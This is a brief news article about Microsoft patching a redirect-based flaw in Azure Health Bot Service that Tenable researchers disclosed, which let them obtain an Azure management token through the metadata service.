Microsoft has fixed a serious vulnerability in Azure Health Bot Service, an AI-powered tool that allows developers to create and deploy virtual health assistants. This flaw, identified by Tenable, a cybersecurity firm, put the integrity of patients’ confidential data at risk, as it allowed malicious actors to laterally move through the IT infrastructure of healthcare organizations.
Azure Health Bot Service is designed to help healthcare organizations reduce costs and improve efficiency, without compromising compliance with regulations. However, when working with a large amount of sensitive information, data security becomes a crucial aspect. Tenable decided to analyze how the chatbot manages the workload and discovered a series of flaws in a function known as “Data Connections,” designed to extract data from other services.
Although this tool has built-in safeguards to block unauthorized access to internal APIs, researchers managed to bypass these protections using a technical approach: they set up an external host controlled by them and used it to issue targeted 301 redirect responses to the Azure Metadata Service (IMDS).

This maneuver allowed them to obtain a valid metadata response, which contained an access token to management.azure.com. With this token, they were able to access a list of all available subscriptions, thus exposing potentially sensitive information.
The experts at Tenable, who reported these findings to Microsoft a few months ago, emphasized that the vulnerability found was not due to flaws in the AI models, but in the underlying architecture of the AI chatbot service. After becoming aware of it, Microsoft acted quickly and patched the vulnerability in all affected regions. So far, no evidence has been found that this vulnerability has been exploited in real environments, suggesting that the corrective measures were effective and timely.